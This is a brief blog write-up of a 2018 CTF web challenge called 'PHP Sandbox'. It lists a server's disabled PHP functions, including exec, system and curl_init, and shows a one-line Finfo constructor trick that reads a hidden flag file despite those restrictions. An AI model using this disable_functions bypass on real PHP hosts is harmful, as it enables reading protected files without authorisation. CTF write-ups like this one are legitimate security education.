Wargames 2018 – PHP Sandbox

Hi readers, during a CTF we (Shah and myself) participated this year, we were given a web challenge called PHP Sandbox. The web application allows participants to insert any PHP code. While trying to create a web shell, we got an error which stated “the function was disabled”. We then viewed the PHP information by executing the below command:

phpinfo();

Upon reading the phpinfo, we noticed that quite a number of functions was disabled as shown in the figure below:

phpinfo

Below is the list of disable functions:

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,shell_exec,proc_open,popen,system,passthru,file_get_contents,readfile,fopen,ini_set,fgets,include,include_once,require,require_once,fgetcsv,parse_ini_file,rename,copy,symlink,fseek,file,file_exists,delete,chmod,fpassthru,freed,fscanf,stream_wrapper_register,stream_wrapper_restore,fsockopen,pfsockopen,curl_init,stream_context_create,show_source,highlight_file,sleep,token_get_all,yaml_parse_file

While trying to figure out how could we read the flag, we then tried to read the directory as shown in the figure below:

Reading the directory

After some trial and errors, we finally found a solution on how we could read the flag without using any of the disable functions. Below command was used to read the flag:

new Finfo(0,’.supers3cr37file.php’);

Figure belows proves that we have successfully read the flag:

Flag

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.